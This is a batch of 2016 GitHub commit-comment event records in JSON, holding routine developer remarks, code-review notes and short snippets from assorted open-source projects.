{"id":"4612904016","type":"CommitCommentEvent","actor":{"login":"amazingr4b"},"repo":{"name":"amazingr4b/TBN-Plex"},"payload":{"comment":{"id":19159292,"position":null,"line":null,"path":null,"commit_id":"2051ded44664cc37841e339523a489b563a2c9a9","created_at":"2016-09-24T17:44:16Z","updated_at":"2016-09-24T17:44:16Z","body":"Usage Example:\r\n\r\npi@raspberrypi:~/hasystem $ python getshow.py \"Ash vs Evil Dead\"\r\nDatabase update starting...\r\n\r\nAsh vs Evil Dead\r\nFOUND!!\r\nTV entries checked.\r\nhttp://192.168.1.134:32400/library/metadata/245766/allLeaves\r\nNew Episode Found: Ash vs Evil Dead Episode: El Jefe\r\nNew Episode Found: Ash vs Evil Dead Episode: Bait\r\nNew Episode Found: Ash vs Evil Dead Episode: Books from Beyond\r\nNew Episode Found: Ash vs Evil Dead Episode: Brujo\r\nNew Episode Found: Ash vs Evil Dead Episode: The Host\r\nNew Episode Found: Ash vs Evil Dead Episode: The Killer of Killers\r\nNew Episode Found: Ash vs Evil Dead Episode: Fire in the Hole\r\nNew Episode Found: Ash vs Evil Dead Episode: Ashes to Ashes\r\nNew Episode Found: Ash vs Evil Dead Episode: Bound in Flesh\r\nNew Episode Found: Ash vs Evil Dead Episode: The Dark One\r\nTV entries checked.\r\nDone\r\npi@raspberrypi:~/hasystem $ showdetails \"Ash vs Evil Dead\"\r\nFor the show: Ash vs Evil Dead\r\nSummary: After 30 years, the Deadites track down Ash, the man who thwarted their efforts to consume the world in evil. Now they're back... and an aging Ash discovers that he must rise to the challenge whether he wants to or not.\r\nGenre: Comedy, Horror, Thriller,\r\nRating: TV-MA\r\nDuration: 30 minutes\r\nNumber of Episodes: 10"}},"created_at":"2016-09-24T17:44:16Z"}
{"id":"4612910339","type":"CommitCommentEvent","actor":{"login":"ramapcsx2"},"repo":{"name":"PCSX2/pcsx2"},"payload":{"comment":{"id":19159320,"position":null,"line":null,"path":null,"commit_id":"719982e4a31a9bdc7ac7cbe33eda958335199ff4","created_at":"2016-09-24T17:48:49Z","updated_at":"2016-09-24T17:48:49Z","body":"Tomb Raider is 95% good now. Jak and Dexter looked perfect.\r\nNice work :)"}},"created_at":"2016-09-24T17:48:49Z"}
{"id":"4612914416","type":"CommitCommentEvent","actor":{"login":"WickedShell"},"repo":{"name":"jdolan/quetoo"},"payload":{"comment":{"id":19159340,"position":null,"line":null,"path":null,"commit_id":"6f29562e712959380668e1b672dbfe86e6eeb52a","created_at":"2016-09-24T17:51:56Z","updated_at":"2016-09-24T17:51:56Z","body":"#199 is related to trying to offer that.\n\nOn Sep 24, 2016 10:35, \"kaadmy\" <notifications@github.com> wrote:\n\n> Would it be possible to have a more customizable scoreboard?\n> There could be a scoreboard order CVar to change the order the stats\n> appear in, an example would be cg_scoreboard_order \"frags deaths captures\"\n> .\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/jdolan/quetoo/commit/6f29562e712959380668e1b672dbfe86e6eeb52a#commitcomment-19159246>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AAipiMbxgYF-9oFU7JtzMBJalVDcVfb1ks5qtV90gaJpZM4KFntj>\n> .\n>\n"}},"created_at":"2016-09-24T17:51:56Z"}
{"id":"4612916858","type":"CommitCommentEvent","actor":{"login":"anselmdk"},"repo":{"name":"silverstripe/silverstripe-installer"},"payload":{"comment":{"id":19159349,"position":null,"line":null,"path":null,"commit_id":"1311aede1caca49c654f3b9d8e8a7da14cb8e1b0","created_at":"2016-09-24T17:53:51Z","updated_at":"2016-09-24T17:53:51Z","body":"how come the `.editorconfig` file is still proposing tabs?"}},"created_at":"2016-09-24T17:53:51Z"}
{"id":"4612917976","type":"CommitCommentEvent","actor":{"login":"mauricestam"},"repo":{"name":"DefinitelyTyped/DefinitelyTyped"},"payload":{"comment":{"id":19159356,"position":null,"line":null,"path":null,"commit_id":"1e92c152ee1b7af9b39f01789de37e2e463fd0de","created_at":"2016-09-24T17:54:41Z","updated_at":"2016-09-24T17:54:41Z","body":"@jdbriaris How did you workaround this issue? I wonder why @frogcjn did not reply to this issue yet. I am having this problem as well.  I am a bit surprised this issue lived for 2 months now. Apparently not that many users are using strong typing and intellisense with their web development."}},"created_at":"2016-09-24T17:54:41Z"}
{"id":"4612918064","type":"CommitCommentEvent","actor":{"login":"uxmal"},"repo":{"name":"uxmal/reko"},"payload":{"comment":{"id":19159358,"position":25,"line":173,"path":"src/Environments/SysV/SysVPlatform.cs","commit_id":"6cbcb348eaa635d3b7b603ac17b1d460df6e04ea","created_at":"2016-09-24T17:54:46Z","updated_at":"2016-09-24T17:54:46Z","body":"yes, it should. Fixing this on my machine."}},"created_at":"2016-09-24T17:54:46Z"}
{"id":"4612919936","type":"CommitCommentEvent","actor":{"login":"GnaneshKunal"},"repo":{"name":"GnaneshKunal/PHP-Simple-Blog"},"payload":{"comment":{"id":19159367,"position":null,"line":null,"path":null,"commit_id":"06a1d8a0df4f2f987970c46910afd74778330f12","created_at":"2016-09-24T17:56:09Z","updated_at":"2016-09-24T17:56:09Z","body":"New Styles"}},"created_at":"2016-09-24T17:56:09Z"}
{"id":"4612922215","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19159375,"position":null,"line":null,"path":null,"commit_id":"fc5b8c5c900bd7eb75f0b4d6d35c4fe4751db000","created_at":"2016-09-24T17:57:49Z","updated_at":"2016-09-24T17:57:49Z","body":"develop (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1197 of 1197 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-fc5b8c5c900bd7eb75f0b4d6d35c4fe4751db000-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-fc5b8c5c900bd7eb75f0b4d6d35c4fe4751db000-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-fc5b8c5c900bd7eb75f0b4d6d35c4fe4751db000-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-36.14%25-green.svg)</a>\n"}},"created_at":"2016-09-24T17:57:49Z"}
{"id":"4612924280","type":"CommitCommentEvent","actor":{"login":"li-kai"},"repo":{"name":"nusmodifications/nusmods"},"payload":{"comment":{"id":19159383,"position":null,"line":null,"path":null,"commit_id":"2786ede8fb950ba8d07eed632cbf0f6fce837132","created_at":"2016-09-24T17:59:21Z","updated_at":"2016-09-24T17:59:21Z","body":"```\r\nconst DEFAULT_EARLIEST_TIME: number = 9 * 2;\r\nconst DEFAULT_LATEST_TIME: number = 20 * 2;\r\n```\r\n\r\n```\r\ncalculateBorderTimings(lessons: TimetableArrangement): { startingIndex: number, endingIndex: number } {\r\n    let earliestTime: number = DEFAULT_EARLIEST_TIME;\r\n    let latestTime: number = DEFAULT_LATEST_TIME;\r\n    SCHOOLDAYS.forEach((day) => {\r\n      const lessonsArray: Array<RawLesson> = _.flatten(lessons[day]);\r\n      lessonsArray.forEach((lesson) => {\r\n        earliestTime = Math.min(earliestTime, convertTimeToIndex(lesson.StartTime));\r\n        latestTime = Math.max(latestTime, convertTimeToIndex(lesson.EndTime));\r\n      });\r\n    });\r\n    return {\r\n      startingIndex: earliestTime,\r\n      endingIndex: latestTime,\r\n    };\r\n  }\r\n```\r\n\r\nthis would suffice, wouldn't it?"}},"created_at":"2016-09-24T17:59:21Z"}
{"id":"4612924645","type":"CommitCommentEvent","actor":{"login":"KnightDev"},"repo":{"name":"KnightDev/AdvancedBan"},"payload":{"comment":{"id":19159386,"position":null,"line":null,"path":null,"commit_id":"ade6922ac67e3de929f72f640da0f7923ec0c7c4","created_at":"2016-09-24T17:59:39Z","updated_at":"2016-09-24T17:59:39Z","body":"No offense but it's for my personal usage and I'll do what I please with it. Maybe I was going to add them back in a better way, who knows? Don't jump my ass. Stick to your own thing and I'll stick to mine. "}},"created_at":"2016-09-24T17:59:39Z"}
{"id":"4612924683","type":"CommitCommentEvent","actor":{"login":"mecctro"},"repo":{"name":"SoylentNews/rehash"},"payload":{"comment":{"id":19159387,"position":null,"line":null,"path":null,"commit_id":"2a8ae063294ed6769b5701a071d895c8759638db","created_at":"2016-09-24T17:59:41Z","updated_at":"2016-09-24T17:59:41Z","body":"The apache config, the slash config, or the genned site config? Either way, I didn't see a reference to handling the new domain per site-install, do you have a reference to where it does something similar?"}},"created_at":"2016-09-24T17:59:41Z"}
{"id":"4612927695","type":"CommitCommentEvent","actor":{"login":"yangshun"},"repo":{"name":"nusmodifications/nusmods"},"payload":{"comment":{"id":19159399,"position":null,"line":null,"path":null,"commit_id":"2786ede8fb950ba8d07eed632cbf0f6fce837132","created_at":"2016-09-24T18:01:28Z","updated_at":"2016-09-24T18:01:28Z","body":"Yes.. :joy:"}},"created_at":"2016-09-24T18:01:28Z"}
{"id":"4612929891","type":"CommitCommentEvent","actor":{"login":"pbkiimc"},"repo":{"name":"pbkiimc/imad-2016-app"},"payload":{"comment":{"id":19159403,"position":null,"line":null,"path":null,"commit_id":"b6930be1cacc95e614776adba5d1d2ecc1117086","created_at":"2016-09-24T18:02:59Z","updated_at":"2016-09-24T18:02:59Z","body":"<html>\r\n <title>\r\n +New Project\r\n +</title>\r\n +<head>\r\n +Travel app\r\n +</head>\r\n +</html>"}},"created_at":"2016-09-24T18:02:59Z"}
{"id":"4612931367","type":"CommitCommentEvent","actor":{"login":"ViktoriyaRyazhska"},"repo":{"name":"vvv123/myTestRepository"},"payload":{"comment":{"id":19159411,"position":1,"line":1,"path":"Test","commit_id":"d631acb50a483e386c1c3ded2beb267f5f64add5","created_at":"2016-09-24T18:04:01Z","updated_at":"2016-09-24T18:04:01Z","body":"Test review"}},"created_at":"2016-09-24T18:04:01Z"}
{"id":"4612932240","type":"CommitCommentEvent","actor":{"login":"joergoster"},"repo":{"name":"joergoster/Stockfish"},"payload":{"comment":{"id":19159412,"position":null,"line":null,"path":null,"commit_id":"1aeb1a4f2ba3669ca007fab8a98ef2e18c22cc4b","created_at":"2016-09-24T18:04:34Z","updated_at":"2016-09-24T18:04:34Z","body":"Thank you!"}},"created_at":"2016-09-24T18:04:34Z"}
{"id":"4612933782","type":"CommitCommentEvent","actor":{"login":"thangngoc89"},"repo":{"name":"MoOx/phenomic"},"payload":{"comment":{"id":19159418,"position":null,"line":null,"path":null,"commit_id":"a29759263b8df488f3a2f24e6e638c7969193f59","created_at":"2016-09-24T18:05:30Z","updated_at":"2016-09-24T18:05:30Z","body":"Oh. I see. ,Webpack error message should be more useful"}},"created_at":"2016-09-24T18:05:30Z"}
{"id":"4612934445","type":"CommitCommentEvent","actor":{"login":"mlynch"},"repo":{"name":"driftyco/ionic-native"},"payload":{"comment":{"id":19159422,"position":null,"line":null,"path":null,"commit_id":"c33842f8f027d0ccd0259e807a3a6c64bc4b81f0","created_at":"2016-09-24T18:05:57Z","updated_at":"2016-09-24T18:05:57Z","body":"Yes a separate branch could be a good idea but I also think everyone should just upgrade to typescript 2..."}},"created_at":"2016-09-24T18:05:57Z"}
{"id":"4612934631","type":"CommitCommentEvent","actor":{"login":"tkrokli"},"repo":{"name":"TrinityCore/TrinityCore"},"payload":{"comment":{"id":19159423,"position":null,"line":null,"path":null,"commit_id":"96316530d8eef7be278ca7baad952ebef0696a0a","created_at":"2016-09-24T18:06:04Z","updated_at":"2016-09-24T18:06:04Z","body":"Good, nice find. 👍"}},"created_at":"2016-09-24T18:06:04Z"}
{"id":"4612936629","type":"CommitCommentEvent","actor":{"login":"ViktoriyaRyazhska"},"repo":{"name":"vvv123/myTestRepository"},"payload":{"comment":{"id":19159435,"position":2,"line":2,"path":"Test","commit_id":"66a2d409f8d70420f1420733d296b62ea48dbd5d","created_at":"2016-09-24T18:07:26Z","updated_at":"2016-09-24T18:07:26Z","body":"comment"}},"created_at":"2016-09-24T18:07:26Z"}
{"id":"4612936892","type":"CommitCommentEvent","actor":{"login":"ViktoriyaRyazhska"},"repo":{"name":"vvv123/myTestRepository"},"payload":{"comment":{"id":19159438,"position":1,"line":1,"path":"test2.txt","commit_id":"66a2d409f8d70420f1420733d296b62ea48dbd5d","created_at":"2016-09-24T18:07:38Z","updated_at":"2016-09-24T18:07:38Z","body":"comment"}},"created_at":"2016-09-24T18:07:38Z"}
{"id":"4612937661","type":"CommitCommentEvent","actor":{"login":"thangngoc89"},"repo":{"name":"MoOx/phenomic"},"payload":{"comment":{"id":19159444,"position":null,"line":null,"path":null,"commit_id":"9334b34e0b3a6daea32c7d0d0c72d0bd37cb1cbd","created_at":"2016-09-24T18:08:06Z","updated_at":"2016-09-24T18:08:06Z","body":":+1:"}},"created_at":"2016-09-24T18:08:06Z"}
{"id":"4612937840","type":"CommitCommentEvent","actor":{"login":"ViktoriyaRyazhska"},"repo":{"name":"vvv123/myTestRepository"},"payload":{"comment":{"id":19159446,"position":3,"line":3,"path":"Test","commit_id":"66a2d409f8d70420f1420733d296b62ea48dbd5d","created_at":"2016-09-24T18:08:13Z","updated_at":"2016-09-24T18:08:13Z","body":"comment1"}},"created_at":"2016-09-24T18:08:13Z"}
{"id":"4612944743","type":"CommitCommentEvent","actor":{"login":"AdFad666"},"repo":{"name":"mozilla-b2g/gaia"},"payload":{"comment":{"id":19159469,"position":null,"line":null,"path":null,"commit_id":"975a35c0f5010df341e96d6c5ec60217f5347412","created_at":"2016-09-24T18:12:54Z","updated_at":"2016-09-24T18:12:54Z","body":"I has a sad :cry: "}},"created_at":"2016-09-24T18:12:54Z"}
{"id":"4612945849","type":"CommitCommentEvent","actor":{"login":"sbrossie"},"repo":{"name":"killbill/killbill-admin-ui"},"payload":{"comment":{"id":19159474,"position":62,"line":88,"path":"app/models/kaui/admin_tenant.rb","commit_id":"4e6b96663f4063c2012d71dea3b633a53d484ff6","created_at":"2016-09-24T18:13:43Z","updated_at":"2016-09-24T18:13:43Z","body":"We should talk... I am probably making things more complex than they need to-- i tried the json approach, but i did not like it, did not seem compact enough. Probably i am crazy..."}},"created_at":"2016-09-24T18:13:43Z"}
{"id":"4612946200","type":"CommitCommentEvent","actor":{"login":"regalstreak"},"repo":{"name":"halogenOS/android_build"},"payload":{"comment":{"id":19159476,"position":null,"line":null,"path":null,"commit_id":"fcc4b2fc143062f8051ba81133d68ac41d69deab","created_at":"2016-09-24T18:13:59Z","updated_at":"2016-09-24T18:13:59Z","body":"But we dont need this as I got no error. Did you?"}},"created_at":"2016-09-24T18:13:59Z"}
{"id":"4612946427","type":"CommitCommentEvent","actor":{"login":"ramonornela"},"repo":{"name":"driftyco/ionic-native"},"payload":{"comment":{"id":19159478,"position":null,"line":null,"path":null,"commit_id":"c33842f8f027d0ccd0259e807a3a6c64bc4b81f0","created_at":"2016-09-24T18:14:08Z","updated_at":"2016-09-24T18:14:08Z","body":"The problem that projects in Ionic 2.0.0-beta11 not catch fixes, because structure use tsyfy 0.14 in the gulp."}},"created_at":"2016-09-24T18:14:08Z"}
{"id":"4612948142","type":"CommitCommentEvent","actor":{"login":"philborman"},"repo":{"name":"philborman/LazyLibrarian"},"payload":{"comment":{"id":19159483,"position":null,"line":null,"path":null,"commit_id":"4bbaec0d9876ad8d5b246be40d7ccf2c6926845c","created_at":"2016-09-24T18:15:21Z","updated_at":"2016-09-24T18:15:21Z","body":"Will allow us to\r\n monitor downloaders and track percentage completed, eta \r\n check files in the torrents/nzbs and modify filenames\r\n handle zipped archives etc.\r\nNo code to implement any of this yet !"}},"created_at":"2016-09-24T18:15:21Z"}
{"id":"4612949921","type":"CommitCommentEvent","actor":{"login":"xdevs23"},"repo":{"name":"halogenOS/android_build"},"payload":{"comment":{"id":19159487,"position":null,"line":null,"path":null,"commit_id":"fcc4b2fc143062f8051ba81133d68ac41d69deab","created_at":"2016-09-24T18:16:32Z","updated_at":"2016-09-24T18:16:32Z","body":"I did. After this not anymore.\n\nAm 23.09.2016 6:40 nachm. schrieb \"Neil Agarwal\" <notifications@github.com>:\n\n> Why do we need this still?\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/halogenOS/android_build/commit/fcc4b2fc143062f8051ba81133d68ac41d69deab#commitcomment-19149242>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AGowjVmEjhtgPMmKb57GaIAc-0rtIeiTks5qtADigaJpZM4KFK5G>\n> .\n>\n"}},"created_at":"2016-09-24T18:16:32Z"}
{"id":"4612950453","type":"CommitCommentEvent","actor":{"login":"lucabrivio"},"repo":{"name":"lucabrivio/Stockfish"},"payload":{"comment":{"id":19159489,"position":null,"line":null,"path":null,"commit_id":"0bd3a8d3c44577e07b795df84f08c79cb40cc439","created_at":"2016-09-24T18:16:55Z","updated_at":"2016-09-24T18:16:55Z","body":"I should also try compensating with the Unsupported penalty..."}},"created_at":"2016-09-24T18:16:55Z"}
{"id":"4612952162","type":"CommitCommentEvent","actor":{"login":"chaosking121"},"repo":{"name":"chaosking121/mal"},"payload":{"comment":{"id":19159496,"position":47,"line":154,"path":"plugins.py","commit_id":"80885cd33f52c830944b171c28066fc3074a8cd0","created_at":"2016-09-24T18:18:08Z","updated_at":"2016-09-24T18:18:08Z","body":"oops..."}},"created_at":"2016-09-24T18:18:08Z"}
{"id":"4612953373","type":"CommitCommentEvent","actor":{"login":"ThomasConnor"},"repo":{"name":"PCSX2/pcsx2"},"payload":{"comment":{"id":19159499,"position":null,"line":null,"path":null,"commit_id":"76494e5f9ced188d15e218ac365b43cbd748f49d","created_at":"2016-09-24T18:18:58Z","updated_at":"2016-09-24T18:18:58Z","body":"Ah, thanks for that... Felt like i was going crazy trying to figure it out."}},"created_at":"2016-09-24T18:18:58Z"}
{"id":"4612954301","type":"CommitCommentEvent","actor":{"login":"sbrossie"},"repo":{"name":"killbill/killbill-admin-ui"},"payload":{"comment":{"id":19159502,"position":5,"line":19,"path":"app/views/kaui/admin_tenants/_show_overdue.erb","commit_id":"4e6b96663f4063c2012d71dea3b633a53d484ff6","created_at":"2016-09-24T18:19:43Z","updated_at":"2016-09-24T18:19:43Z","body":"I think the condition is correct but my naming makes no sense at all (i need to think that through)..."}},"created_at":"2016-09-24T18:19:43Z"}
{"id":"4612954483","type":"CommitCommentEvent","actor":{"login":"GalaticStryder"},"repo":{"name":"GalaticStryder/kernel_lge_msm8974"},"payload":{"comment":{"id":19159503,"position":null,"line":null,"path":null,"commit_id":"a89ee49301719f9c02ac6d60fcd6c62557c84e56","created_at":"2016-09-24T18:19:51Z","updated_at":"2016-09-24T18:19:51Z","body":"@neobuddy89 I've adapted your code changes to my tree. I'm using the latest version from engstk as base, it already had some jiffies changes and other updates. So far, this driver doesn't seem to spike up the frequencies as it was before the changes."}},"created_at":"2016-09-24T18:19:51Z"}
{"id":"4612956078","type":"CommitCommentEvent","actor":{"login":"andy-ms"},"repo":{"name":"DefinitelyTyped/DefinitelyTyped"},"payload":{"comment":{"id":19159506,"position":null,"line":null,"path":null,"commit_id":"1e92c152ee1b7af9b39f01789de37e2e463fd0de","created_at":"2016-09-24T18:20:54Z","updated_at":"2016-09-24T18:20:54Z","body":"@jdbriaris, @mirthestam Accepting PRs!"}},"created_at":"2016-09-24T18:20:54Z"}
{"id":"4612959461","type":"CommitCommentEvent","actor":{"login":"stgraber"},"repo":{"name":"brauner/lxd"},"payload":{"comment":{"id":19159517,"position":6,"line":15,"path":"lxd/container_post.go","commit_id":"35a2b39cc9f044bfcedec18a3d2646b385928d04","created_at":"2016-09-24T18:23:09Z","updated_at":"2016-09-24T18:23:09Z","body":"Should be called Stateful (stateful in json) for consistency."}},"created_at":"2016-09-24T18:23:09Z"}
{"id":"4612961648","type":"CommitCommentEvent","actor":{"login":"stgraber"},"repo":{"name":"brauner/lxd"},"payload":{"comment":{"id":19159528,"position":19,"line":23,"path":"lxd/container_post.go","commit_id":"35a2b39cc9f044bfcedec18a3d2646b385928d04","created_at":"2016-09-24T18:24:45Z","updated_at":"2016-09-24T18:24:45Z","body":"Nitpick, but that's quite a bit longer than just having \"name\" be defined with \":=\", leave err alone (will be defined with the ioutil.ReadAll call) and just add a \"var c container\" at the top of the function."}},"created_at":"2016-09-24T18:24:45Z"}
{"id":"4612962182","type":"CommitCommentEvent","actor":{"login":"mgreter"},"repo":{"name":"mgreter/sass2scss"},"payload":{"comment":{"id":19159536,"position":null,"line":null,"path":null,"commit_id":"f03b821e6e82dce096213c1f48350b06489449d8","created_at":"2016-09-24T18:25:06Z","updated_at":"2016-09-24T18:25:06Z","body":"Fixes https://github.com/mgreter/sass2scss/issues/26"}},"created_at":"2016-09-24T18:25:06Z"}
{"id":"4612964262","type":"CommitCommentEvent","actor":{"login":"stgraber"},"repo":{"name":"brauner/lxd"},"payload":{"comment":{"id":19159550,"position":22,"line":1992,"path":"client.go","commit_id":"26f2fc6562714be94df6ec31de914befd731573f","created_at":"2016-09-24T18:26:30Z","updated_at":"2016-09-24T18:26:30Z","body":"Shouldn't that be conditional on push?"}},"created_at":"2016-09-24T18:26:30Z"}
{"id":"4612967489","type":"CommitCommentEvent","actor":{"login":"stgraber"},"repo":{"name":"brauner/lxd"},"payload":{"comment":{"id":19159561,"position":null,"line":null,"path":null,"commit_id":"726bbdaf130f7ba152da2f5ee36c1b9c3d5c777d","created_at":"2016-09-24T18:28:45Z","updated_at":"2016-09-24T18:28:45Z","body":"Hmm, so that's a backward compatibility break as existing clients won't know to set Live to true, turning all existing live migration into offline migration.\r\n\r\nThe Live attribute should only be needed when using the new push mode."}},"created_at":"2016-09-24T18:28:45Z"}
{"id":"4612968851","type":"CommitCommentEvent","actor":{"login":"LewisGaul"},"repo":{"name":"insciteco/oxford"},"payload":{"comment":{"id":19159568,"position":null,"line":null,"path":null,"commit_id":"820301c320e8968ce1141276a9ca25d81696db8a","created_at":"2016-09-24T18:29:49Z","updated_at":"2016-09-24T18:29:49Z","body":"I couldn't work out how to reduce the vertical spacing and remove the horizontal borders. "}},"created_at":"2016-09-24T18:29:49Z"}
{"id":"4612974088","type":"CommitCommentEvent","actor":{"login":"Samehadar"},"repo":{"name":"Samehadar/vk-java-sdk"},"payload":{"comment":{"id":19159588,"position":null,"line":null,"path":null,"commit_id":"4ac1358984153bb79df821816e32e52cb6543a4d","created_at":"2016-09-24T18:33:24Z","updated_at":"2016-09-24T18:33:24Z","body":"lol"}},"created_at":"2016-09-24T18:33:24Z"}
{"id":"4612978185","type":"CommitCommentEvent","actor":{"login":"FauziAkram"},"repo":{"name":"FauziAkram/Stockfish"},"payload":{"comment":{"id":19159614,"position":null,"line":null,"path":null,"commit_id":"0d60c459ff324cd460145f73215d28356d0a4e69","created_at":"2016-09-24T18:36:27Z","updated_at":"2016-09-24T18:36:27Z","body":"Thanks,\r\n\r\nFixed."}},"created_at":"2016-09-24T18:36:27Z"}
{"id":"4612978253","type":"CommitCommentEvent","actor":{"login":"inspiredtolive"},"repo":{"name":"folksy-squid/Picky-Notes"},"payload":{"comment":{"id":19159617,"position":null,"line":null,"path":null,"commit_id":"a55bb158dc6be568219f67cd4f15b08e5cbb2843","created_at":"2016-09-24T18:36:31Z","updated_at":"2016-09-24T18:36:31Z","body":"Installation and usage instructions for webpack"}},"created_at":"2016-09-24T18:36:31Z"}
{"id":"4612980454","type":"CommitCommentEvent","actor":{"login":"reaalkhalil"},"repo":{"name":"insciteco/oxford"},"payload":{"comment":{"id":19159629,"position":null,"line":null,"path":null,"commit_id":"820301c320e8968ce1141276a9ca25d81696db8a","created_at":"2016-09-24T18:38:14Z","updated_at":"2016-09-24T18:38:14Z","body":"keep em, actually looks pretty good like this!"}},"created_at":"2016-09-24T18:38:14Z"}
{"id":"4612980610","type":"CommitCommentEvent","actor":{"login":"rks92"},"repo":{"name":"rks92/LPC"},"payload":{"comment":{"id":19159632,"position":55,"line":0,"path":"app/views/league/fixtures.html.erb","commit_id":"e8c8060cc81e9a4155ec3785a6f675c422ce902c","created_at":"2016-09-24T18:38:22Z","updated_at":"2016-09-24T18:38:22Z","body":"This isn't gonna work this is the path to the file only on your computer. Look at relative paths for rails"}},"created_at":"2016-09-24T18:38:22Z"}
{"id":"4612986037","type":"CommitCommentEvent","actor":{"login":"bladika"},"repo":{"name":"coryjfowler/MCP_CAN_lib"},"payload":{"comment":{"id":19159645,"position":null,"line":null,"path":null,"commit_id":"14db2dcafc24f00b467c4e139bfa22d875a11c90","created_at":"2016-09-24T18:41:58Z","updated_at":"2016-09-24T18:41:58Z","body":"Hi,\r\n\r\ncan you please include how to switch into ONESHOT mode?\r\nThanks in advance!"}},"created_at":"2016-09-24T18:41:58Z"}
{"id":"4612988879","type":"CommitCommentEvent","actor":{"login":"janschopohl"},"repo":{"name":"TUM-LRR/era-gp-sim"},"payload":{"comment":{"id":19159649,"position":null,"line":null,"path":null,"commit_id":"1a8e8d006bb08dbc5fa6ea4ac2c133f1606f0ad7","created_at":"2016-09-24T18:44:03Z","updated_at":"2016-09-24T18:44:03Z","body":"https://github.com/TUM-LRR/era-gp-sim/issues/83"}},"created_at":"2016-09-24T18:44:03Z"}
{"id":"4612991661","type":"CommitCommentEvent","actor":{"login":"AleksCore"},"repo":{"name":"JarnoVgr/Mr.Green-MTA-Resources"},"payload":{"comment":{"id":19159657,"position":null,"line":null,"path":null,"commit_id":"1d7843b594dea34b43274aec854812d93b7c1ea5","created_at":"2016-09-24T18:46:04Z","updated_at":"2016-09-24T18:46:04Z","body":"910ddb10f531b8d974a640de1f7c25a955038461"}},"created_at":"2016-09-24T18:46:04Z"}
{"id":"4612994757","type":"CommitCommentEvent","actor":{"login":"Ghilt"},"repo":{"name":"Ghilt/simulaton"},"payload":{"comment":{"id":19159670,"position":null,"line":null,"path":null,"commit_id":"9bc3257c4a1f7137bc869c96caa32b8d370d7384","created_at":"2016-09-24T18:48:25Z","updated_at":"2016-09-24T18:48:25Z","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Life: concept of available actions](https://trello.com/c/juJsYiZp/7-life-concept-of-available-actions)"}},"created_at":"2016-09-24T18:48:25Z"}
{"id":"4612995475","type":"CommitCommentEvent","actor":{"login":"TevitaMartin"},"repo":{"name":"TevitaMartin/Learning-Projects"},"payload":{"comment":{"id":19159675,"position":null,"line":null,"path":null,"commit_id":"a04cd3d5bdec9e4ff519914c3fcf579782c35aa4","created_at":"2016-09-24T18:48:58Z","updated_at":"2016-09-24T18:48:58Z","body":"Bringing this one back to avoid conflict."}},"created_at":"2016-09-24T18:48:58Z"}
{"id":"4612997074","type":"CommitCommentEvent","actor":{"login":"Febrero"},"repo":{"name":"Semillas/semillas_backend"},"payload":{"comment":{"id":19159683,"position":11,"line":11,"path":"webapp/static/webapp/js/geoexample.js","commit_id":"24e6a225d953bcdeb573063b84a3199a82863511","created_at":"2016-09-24T18:50:11Z","updated_at":"2016-09-24T18:50:11Z","body":"Can give me more details? I have tested it in windows xp with firefox and work."}},"created_at":"2016-09-24T18:50:11Z"}
{"id":"4612997756","type":"CommitCommentEvent","actor":{"login":"lucabrivio"},"repo":{"name":"lucabrivio/Stockfish"},"payload":{"comment":{"id":19159686,"position":null,"line":null,"path":null,"commit_id":"0bd3a8d3c44577e07b795df84f08c79cb40cc439","created_at":"2016-09-24T18:50:47Z","updated_at":"2016-09-24T18:50:47Z","body":"And I think I should cap the number of pawns or something like that..."}},"created_at":"2016-09-24T18:50:47Z"}
{"id":"4612998126","type":"CommitCommentEvent","actor":{"login":"aleksandrserbin"},"repo":{"name":"omamnamore/omamnamore.github.io"},"payload":{"comment":{"id":19159689,"position":6,"line":241,"path":"web2.0/file-change-css.css","commit_id":"ba21f382350d991bfb2f0a112d634a759e90eafb","created_at":"2016-09-24T18:51:04Z","updated_at":"2016-09-24T18:51:04Z","body":"please use file formatting"}},"created_at":"2016-09-24T18:51:04Z"}
{"id":"4612999305","type":"CommitCommentEvent","actor":{"login":"tmathews"},"repo":{"name":"DerrickGold/Remote-Music-Player"},"payload":{"comment":{"id":19159691,"position":null,"line":null,"path":null,"commit_id":"ef2ddffa5722d699d41914e503cda28633ceb30a","created_at":"2016-09-24T18:51:58Z","updated_at":"2016-09-24T18:51:58Z","body":"Nice."}},"created_at":"2016-09-24T18:51:58Z"}
{"id":"4613000236","type":"CommitCommentEvent","actor":{"login":"aleksandrserbin"},"repo":{"name":"omamnamore/omamnamore.github.io"},"payload":{"comment":{"id":19159693,"position":30,"line":127,"path":"web2.0/file2.js","commit_id":"ba21f382350d991bfb2f0a112d634a759e90eafb","created_at":"2016-09-24T18:52:42Z","updated_at":"2016-09-24T18:52:42Z","body":"I think that a better way would be document.createElement(\"p\") => p.innerText  = \"sorry\" => oops.appendChild(p) and so on"}},"created_at":"2016-09-24T18:52:42Z"}
{"id":"4613000346","type":"CommitCommentEvent","actor":{"login":"jdavis"},"repo":{"name":"zacksoliman/latex-homework-template"},"payload":{"comment":{"id":19159694,"position":null,"line":null,"path":null,"commit_id":"469c3b78edce9fe3f2b16d2705841045b23558ed","created_at":"2016-09-24T18:52:46Z","updated_at":"2016-09-24T18:52:46Z","body":"👍  😄 "}},"created_at":"2016-09-24T18:52:46Z"}
